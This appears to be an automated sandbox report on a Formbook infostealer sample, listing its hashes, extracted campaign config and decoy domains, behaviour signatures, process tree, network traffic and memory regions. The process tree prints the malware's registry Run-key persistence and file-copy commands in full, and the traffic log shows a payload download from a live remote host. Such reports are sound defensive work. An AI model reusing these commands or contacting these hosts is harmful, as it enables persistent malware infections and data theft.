Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    07-12-2024 02:49

General

  • Target

    7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021.exe

  • Size

    28KB

  • MD5

    5ad176cf9482ccedc206fca269089b25

  • SHA1

    0b917af3c99023327127aa034d3904888029e2d3

  • SHA256

    7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021

  • SHA512

    9e9c68cd8467f5b08f514b2315025f9e863f66a2d5746f54b5d7d5df89e8b6e9c232bca3fbfedfd6450b2d1ccb37bbd630ea95c0c1bdd5150acd73fb0841d580

  • SSDEEP

    192:+YHwHj0yVgOOVinHuCN0Tv2m5g7EDum0KypCkCgS43IhS/rUO50biUU9H+v5mIAf:4AyrgCNkun7EZ3uBIhErX6mPeJACsxh

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

o62s

Decoy

lectrobay.shop

enisehirarnavutkoy.xyz

itoolz.net

otorcycle-loans-40378.bond

opjobsinusa.today

uara228j.shop

ukulbagus10.click

enhealth07.shop

cpoker.pro

ome-remodeling-16949.bond

andu.shop

hubbychicocharmqs.shop

onghi292.top

ussines-web-creators.net

alenspencer.online

ryptogigt.top

epiyiisigorta.online

ental-implants-77717.bond

juta.click

enisehirevleriarnavutkoy.xyz

Signatures

  • Formbook

    Formbook is data-stealing malware.

  • Formbook family
  • Formbook payload 1 IoCs
  • Obfuscated with Agile.Net obfuscator 1 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 27 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021.exe
    "C:\Users\Admin\AppData\Local\Temp\7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2624
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021" /t REG_SZ /F /D "C:\Users\Admin\Documents\7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021.pif"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4776
      • C:\Windows\SysWOW64\reg.exe
        REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021" /t REG_SZ /F /D "C:\Users\Admin\Documents\7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021.pif"
        3⤵
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        PID:4084
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c Copy "C:\Users\Admin\AppData\Local\Temp\7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021.exe" "C:\Users\Admin\Documents\7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021.pif"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:900
    • C:\Users\Admin\AppData\Local\Temp\7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021.exe
      "C:\Users\Admin\AppData\Local\Temp\7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021.exe"
      2⤵
      PID:5020
    • C:\Users\Admin\AppData\Local\Temp\7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021.exe
      "C:\Users\Admin\AppData\Local\Temp\7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:3628

    Network

    • flag-us
      DNS
      rn3-sa.com
      7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021.exe
      Remote address:
      8.8.8.8:53
      Request
      rn3-sa.com
      IN A
      Response
      rn3-sa.com
      IN A
      66.29.153.238
    • flag-us
      GET
      https://rn3-sa.com/1949
      7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021.exe
      Remote address:
      66.29.153.238:443
      Request
      GET /1949 HTTP/1.1
      Host: rn3-sa.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      keep-alive: timeout=5, max=100
      last-modified: Fri, 29 Nov 2024 04:26:46 GMT
      accept-ranges: bytes
      content-length: 570368
      date: Sat, 07 Dec 2024 02:49:52 GMT
      server: LiteSpeed
      x-turbo-charged-by: LiteSpeed
    • flag-us
      DNS
      8.8.8.8.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      8.8.8.8.in-addr.arpa
      IN PTR
      Response
      8.8.8.8.in-addr.arpa
      IN PTR
      dns.google
    • flag-us
      DNS
      58.55.71.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      58.55.71.13.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      238.153.29.66.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      238.153.29.66.in-addr.arpa
      IN PTR
      Response
      238.153.29.66.in-addr.arpa
      IN PTR
      premium247-3.web-hosting.com
    • flag-us
      DNS
      25.125.209.23.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      25.125.209.23.in-addr.arpa
      IN PTR
      Response
      25.125.209.23.in-addr.arpa
      IN PTR
      a23-209-125-25.deploy.static.akamaitechnologies.com
    • flag-us
      DNS
      73.31.126.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      73.31.126.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      241.150.49.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      241.150.49.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      53.210.109.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      53.210.109.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      198.187.3.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      198.187.3.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      181.129.81.91.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      181.129.81.91.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      172.210.232.199.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      172.210.232.199.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      43.229.111.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      43.229.111.52.in-addr.arpa
      IN PTR
      Response
    • 66.29.153.238:443
      https://rn3-sa.com/1949
      tls, http
      7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021.exe
      14.1kB
      593.9kB
      283
      429

      HTTP Request

      GET https://rn3-sa.com/1949

      HTTP Response

      200
    • 8.8.8.8:53
      rn3-sa.com
      dns
      7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021.exe
      56 B
      72 B
      1
      1

      DNS Request

      rn3-sa.com

      DNS Response

      66.29.153.238

    • 8.8.8.8:53
      8.8.8.8.in-addr.arpa
      dns
      66 B
      90 B
      1
      1

      DNS Request

      8.8.8.8.in-addr.arpa

    • 8.8.8.8:53
      58.55.71.13.in-addr.arpa
      dns
      70 B
      144 B
      1
      1

      DNS Request

      58.55.71.13.in-addr.arpa

    • 8.8.8.8:53
      238.153.29.66.in-addr.arpa
      dns
      72 B
      114 B
      1
      1

      DNS Request

      238.153.29.66.in-addr.arpa

    • 8.8.8.8:53
      25.125.209.23.in-addr.arpa
      dns
      72 B
      137 B
      1
      1

      DNS Request

      25.125.209.23.in-addr.arpa

    • 8.8.8.8:53
      73.31.126.40.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      73.31.126.40.in-addr.arpa

    • 8.8.8.8:53
      241.150.49.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      241.150.49.20.in-addr.arpa

    • 8.8.8.8:53
      53.210.109.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      53.210.109.20.in-addr.arpa

    • 8.8.8.8:53
      198.187.3.20.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      198.187.3.20.in-addr.arpa

    • 8.8.8.8:53
      181.129.81.91.in-addr.arpa
      dns
      72 B
      147 B
      1
      1

      DNS Request

      181.129.81.91.in-addr.arpa

    • 8.8.8.8:53
      172.210.232.199.in-addr.arpa
      dns
      74 B
      128 B
      1
      1

      DNS Request

      172.210.232.199.in-addr.arpa

    • 8.8.8.8:53
      43.229.111.52.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      43.229.111.52.in-addr.arpa

    MITRE ATT&CK Enterprise v15


    Downloads

    • memory/2624-6-0x0000000074800000-0x0000000074FB0000-memory.dmp

      Filesize

      7.7MB

    • memory/2624-0-0x000000007480E000-0x000000007480F000-memory.dmp

      Filesize

      4KB

    • memory/2624-2-0x0000000004F80000-0x0000000005524000-memory.dmp

      Filesize

      5.6MB

    • memory/2624-3-0x00000000048F0000-0x0000000004982000-memory.dmp

      Filesize

      584KB

    • memory/2624-4-0x00000000049D0000-0x0000000004A46000-memory.dmp

      Filesize

      472KB

    • memory/2624-5-0x00000000048E0000-0x00000000048EA000-memory.dmp

      Filesize

      40KB

    • memory/2624-1-0x0000000000030000-0x000000000003E000-memory.dmp

      Filesize

      56KB

    • memory/2624-7-0x0000000005EB0000-0x0000000005F42000-memory.dmp

      Filesize

      584KB

    • memory/2624-10-0x00000000062A0000-0x0000000006306000-memory.dmp

      Filesize

      408KB

    • memory/2624-9-0x0000000006100000-0x000000000619C000-memory.dmp

      Filesize

      624KB

    • memory/2624-8-0x0000000005F60000-0x0000000005F7E000-memory.dmp

      Filesize

      120KB

    • memory/2624-16-0x0000000074800000-0x0000000074FB0000-memory.dmp

      Filesize

      7.7MB

    • memory/3628-14-0x00000000014C0000-0x000000000180A000-memory.dmp

      Filesize

      3.3MB

    • memory/3628-13-0x0000000000400000-0x000000000042F000-memory.dmp

      Filesize

      188KB
